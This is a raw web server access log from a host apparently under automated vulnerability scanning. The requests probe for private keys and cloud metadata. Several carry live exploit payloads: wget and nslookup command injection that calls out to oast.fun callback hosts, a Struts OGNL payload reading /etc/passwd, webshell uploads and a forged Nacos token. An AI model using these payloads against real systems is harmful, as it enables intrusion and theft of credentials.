2024-12-12 05:11:00 103.153.214.94 GET /private-key - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 39 2024-12-12 05:11:00 103.153.214.94 GET /id_rsa - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_0)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 42 2024-12-12 05:11:00 103.153.214.94 GET /.ssh/id_rsa_1024 - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.8.25 - 404 7 0 51 2024-12-12 05:11:00 103.153.214.94 GET /ssl/localhost.key - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Safari/605.1.15 - 404 7 0 63 2024-12-12 05:11:00 103.153.214.94 GET /.ssh/id_rsa_4096 - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 69 2024-12-12 05:11:00 103.153.214.94 GET /.ssh/id_dsa - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:98.0)+Gecko/20100101+Firefox/98.0 - 404 7 0 72 2024-12-12 05:11:00 103.153.214.94 GET /id_rsa_2048 - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 56 2024-12-12 05:11:00 103.153.214.94 GET /key.pem - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+U;+Linux+i686;+en-US)+AppleWebKit/534.1+SUSE/6.0.428.0+(KHTML,+like+Gecko)+Chrome/6.0.428.0+Safari/534.1 - 404 7 0 55 2024-12-12 05:11:00 103.153.214.94 GET /host.key - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 05:11:00 103.153.214.94 GET /bcvt.kontum.gov.vn:8172.key - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 400 0 0 58 2024-12-12 05:11:00 103.153.214.94 GET /server.key - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.18 - 404 7 0 57 2024-12-12 05:11:00 103.153.214.94 GET /config/jwt/private.pem - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.22 - 404 7 0 59 2024-12-12 05:11:00 103.153.214.94 GET /.ssh/id_rsa - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 56 2024-12-12 05:11:20 103.153.214.94 GET /certs/bcvt.kontum.gov.vn_private.key - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Safari/605.1.26 - 404 7 0 57 2024-12-12 05:11:21 103.153.214.94 GET /certificates/bcvt.kontum.gov.vn_privkey.pem - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.27 - 404 7 0 55 2024-12-12 05:11:21 103.153.214.94 GET /certs/bcvt.kontum.gov.vn.key - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 51 2024-12-12 05:11:21 103.153.214.94 GET /private.pem - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.212+Safari/537.36 - 404 7 0 47 2024-12-12 05:11:21 103.153.214.94 GET /ssl.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 33 2024-12-12 05:11:21 103.153.214.94 GET /ssl/bcvt.kontum.gov.vn.pem - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 34 2024-12-12 05:11:21 103.153.214.94 GET /private/bcvt.kontum.gov.vn.key - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 05:11:21 103.153.214.94 GET /jwt/private.pem - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5+Safari/605.1.15 - 404 7 0 32 2024-12-12 05:11:21 103.153.214.94 GET /certs/bcvt.kontum.gov.vn.pem - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 33 2024-12-12 05:11:21 103.153.214.94 GET /var/jwt/private.pem - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.87+Safari/537.36 - 404 7 0 33 2024-12-12 05:11:21 103.153.214.94 GET /certificates/bcvt.kontum.gov.vn.p12 - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/109.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 05:11:21 103.153.214.94 GET /cert/bcvt.kontum.gov.vn.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 33 2024-12-12 05:11:21 103.153.214.94 GET /keys/bcvt.kontum.gov.vn.pem - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 42 2024-12-12 05:11:21 103.153.214.94 GET /ssl_key.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 05:11:21 103.153.214.94 GET /cert/bcvt.kontum.gov.vn_key.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_6_6;+de)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.2+Safari/605.1.15 - 404 7 0 40 2024-12-12 05:11:21 103.153.214.94 GET /certificates/bcvt.kontum.gov.vn_priv.pem - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 58 2024-12-12 05:11:21 103.153.214.94 GET /ssl/private/bcvt.kontum.gov.vn_key.pem - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 56 2024-12-12 05:11:21 103.153.214.94 GET /certificates/bcvt.kontum.gov.vn.pfx - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 57 2024-12-12 05:11:21 103.153.214.94 GET /ssl/bcvt.kontum.gov.vn_key.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.27 - 404 7 0 57 2024-12-12 05:11:21 103.153.214.94 GET /cert/kontum.gov.vn_key.txt - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 05:13:48 103.153.214.94 GET / author=1 8172 - 156.251.25.152 - - 404 7 0 236 2024-12-12 05:16:00 103.153.214.94 GET /backupmgt/localJob.php session=fail;wget+http://ctd67t3bclspkptm3qo0q5qntf7c7epu4.oast.fun; 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 05:16:07 103.153.214.94 GET /backupmgt/pre_connect_check.php auth_name=fail;wget+http://ctd67t3bclspkptm3qo0bd8yjyy75n5wj.oast.fun; 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 05:16:27 103.153.214.94 POST /boardDataWW.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 05:19:04 103.153.214.94 POST /website/blog/ - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 206 2024-12-12 05:19:13 103.153.214.94 POST /_search - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Mobile/15E148+Safari/604.1 - 404 7 0 202 2024-12-12 05:19:55 103.153.214.94 GET /qvisdvr/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/618.2.7+(KHTML,+like+Gecko)+Version/17.5+Safari/618.2.7 - 404 7 0 43 2024-12-12 05:20:24 103.153.214.94 GET / gf_page=upload 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6+Safari/605.1.15 - 404 7 0 217 2024-12-12 05:20:28 103.153.214.94 POST / gf_page=upload 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 05:20:32 103.153.214.94 GET /index.action method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 202 2024-12-12 05:21:36 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 05:23:35 103.153.214.94 POST /auth/createAdmin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/118.0 https://bcvt.kontum.gov.vn:8172/app/ 404 7 0 86 2024-12-12 05:25:15 103.153.214.94 POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 210 2024-12-12 05:25:30 103.153.214.94 POST /RPC2 - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 05:25:40 103.153.214.94 GET /BSW_cxttongr.htm - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.88+Safari/537.36 - 404 7 0 201 2024-12-12 05:26:42 103.153.214.94 PUT /_users/org.couchdb.user:poc - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.21 - 400 0 0 209 2024-12-12 05:27:56 103.153.214.94 PUT /fileserver/2q6JQR1e7veD9DdGhP2jp6Vb4i2.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 05:27:59 103.153.214.94 POST /service/ unix:/../../../../var/run/rpc/xmlrpc.sock|http://KtzK/wsrpc 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 33 2024-12-12 05:28:00 103.153.214.94 GET /fileserver/2q6JQR1e7veD9DdGhP2jp6Vb4i2.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 201 2024-12-12 05:28:51 103.153.214.94 POST /javax.faces.resource/dynamiccontent.properties.xhtml - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.2.27 - 404 7 0 214 2024-12-12 05:29:36 103.153.214.94 DELETE /nacos/v1/auth/users/ username=2q3kZ50tiPBATGCakYBV0q0hQS4&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 49 2024-12-12 05:29:36 103.153.214.94 POST /nacos/v1/auth/users/ username=2q3kZ50tiPBATGCakYBV0q0hQS4&password=2q3kZ4fGBy1YoYfuvhyLofqOkM1&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.65 - 404 7 0 46 2024-12-12 05:29:36 103.153.214.94 GET /nacos/v1/auth/users pageNo=1&pageSize=9&search=blur&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 43 2024-12-12 05:30:01 103.153.214.94 GET /webadmin/script command=|%20nslookup%20ctd67t3bclspkptm3qo0iy5pis9m4frq9.oast.fun 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.6+Safari/605.1.15 - 404 7 0 214 2024-12-12 05:31:27 103.153.214.94 GET /maint/modules/home/index.php lang=english|cat%20/etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:100.0)+Gecko/20100101+Firefox/100.0 - 404 7 0 201 2024-12-12 05:31:45 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 221 2024-12-12 05:31:55 103.153.214.94 GET /esp/cms_changeDeviceContext.esp device=aaaaa:a%27";user|s."1337"; 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 260 2024-12-12 05:34:11 103.153.214.94 GET /version - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 119 2024-12-12 05:34:22 103.153.214.94 POST /wls-wsat/RegistrationRequesterPortType - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Mobile/15E148+Safari/604.1 - 404 7 0 241 2024-12-12 05:36:12 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 228 2024-12-12 05:36:24 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 - 404 7 0 199 2024-12-12 05:36:27 103.153.214.94 GET /2q6JQX2oK8n4Z0lhtDr72FBBeDZ.php/x0A - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/39.0.2171.99+Safari/537.36 - 404 7 0 220 2024-12-12 05:37:09 103.153.214.94 PUT /poc.jsp/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.23 - 404 7 0 204 2024-12-12 05:37:09 103.153.214.94 GET /admin/phpMyAdmin/server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.24 - 404 7 0 46 2024-12-12 05:37:10 103.153.214.94 GET /admin/server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:12.0)+Gecko/20100101+Firefox/12.0 - 404 7 0 32 2024-12-12 05:37:10 103.153.214.94 GET /server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.8.22 - 404 7 0 50 2024-12-12 05:37:10 103.153.214.94 GET /phpMyAdmin/server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 404 7 0 44 2024-12-12 05:37:10 103.153.214.94 GET /phpmyadmin/server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 43 2024-12-12 05:37:10 103.153.214.94 GET /admin/pma/server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 43 2024-12-12 05:37:10 103.153.214.94 GET /pma/server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 56 2024-12-12 05:37:10 103.153.214.94 GET /db/server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 55 2024-12-12 05:37:10 103.153.214.94 GET /PMA/server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/22.0.0+Version/17.3.1+Safari/605.1.15 - 404 7 0 54 2024-12-12 05:37:10 103.153.214.94 GET /phpMyAdmin+2/server_import.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:93.0)+Gecko/20100101+Firefox/93.0 - 404 7 0 68 2024-12-12 05:37:12 103.153.214.94 GET /poc.jsp cmd=cat+%2Fetc%2Fpasswd 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 7 0 224 2024-12-12 05:38:13 103.153.214.94 PUT /2q6JQdVfulwk5mTZlzhs4Qejdpr.jsp/ - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 221 2024-12-12 05:38:16 103.153.214.94 GET /2q6JQdVfulwk5mTZlzhs4Qejdpr.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 05:39:38 103.153.214.94 POST /integration/saveGangster.action - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.1.2+Safari/605.1.15 - 404 7 0 216 2024-12-12 05:40:08 103.153.214.94 POST /jolokia/read/getDiagnosticOptions - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/110.0 - 404 7 0 203 2024-12-12 05:40:09 103.153.214.94 POST /cobbler_api - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 05:40:26 103.153.214.94 GET /__ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 216 2024-12-12 05:41:02 103.153.214.94 GET /__debugging_center_utils___.php log=;echo%20yadamhlnmpkgknruglliapnkcnlrcfaf%20|%20id 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 05:41:04 103.153.214.94 GET /__debugging_center_utils___.php log=;echo%20yadamhlnmpkgknruglliapnkcnlrcfaf%20|%20ipconfig 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 205 2024-12-12 05:41:50 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 201 2024-12-12 05:41:53 103.153.214.94 GET /latest/dynamic/instance-identity/document - 8172 - 206.238.196.225 - - 404 7 0 37 2024-12-12 05:41:53 103.153.214.94 GET /2016-01-01/dynamic/instance-identity/document - 8172 - 206.238.196.225 - - 404 7 0 41 2024-12-12 05:41:53 103.153.214.94 GET /2016-01-01/dynamic/instance-identity/document - 8172 - 206.238.196.225 - - 404 7 0 33 2024-12-12 05:41:53 103.153.214.94 GET /latest/dynamic/instance-identity/document - 8172 - 206.238.196.225 - - 404 7 0 67 2024-12-12 05:41:54 103.153.214.94 GET /hw-sys.htm - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/616.19+(KHTML,+like+Gecko)+Version/17.7.17+Safari/616.19 - 404 7 0 224 2024-12-12 05:41:57 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 05:42:00 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 228 2024-12-12 05:44:34 103.153.214.94 POST /invoker/JMXInvokerServlet/ - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 213 2024-12-12 05:44:37 103.153.214.94 POST /invoker/EJBInvokerServlet/ - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 221 2024-12-12 05:44:37 103.153.214.94 POST /nagiosql/admin/logbook.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.17 - 404 7 0 208 2024-12-12 05:44:41 103.153.214.94 POST /invoker/readonly - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6.1+Safari/605.1.15 - 404 7 0 201 2024-12-12 05:44:56 103.153.214.94 POST /clients/editclient.php id=2q6JQXfquX111zdt1N0qU7JgGKS&action=update 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 206 2024-12-12 05:44:59 103.153.214.94 GET /logos_clients/2q6JQXfquX111zdt1N0qU7JgGKS.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 206 2024-12-12 05:46:00 103.153.214.94 POST /nagiosql/admin/menuaccess.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 05:46:45 103.153.214.94 POST /struts2-rest-showcase/orders/3 - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 05:46:48 103.153.214.94 POST /orders/3 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 218 2024-12-12 05:47:01 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 211 2024-12-12 05:47:40 103.153.214.94 POST /upload/index.php route=extension/payment/divido/update 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 210 2024-12-12 05:48:23 103.153.214.94 GET /latest/meta-data/ - 8172 - 206.238.196.225 - - 404 7 0 42 2024-12-12 05:48:23 103.153.214.94 GET /latest/meta-data/ - 8172 - 206.238.196.225 - - 404 7 0 33 2024-12-12 05:48:23 103.153.214.94 GET /latest/meta-data/ - 8172 - 206.238.196.225 - - 404 7 0 40 2024-12-12 05:48:25 103.153.214.94 GET /metadata/instance api-version=2021-02-01 8172 - 206.238.196.225 - - 404 7 0 38 2024-12-12 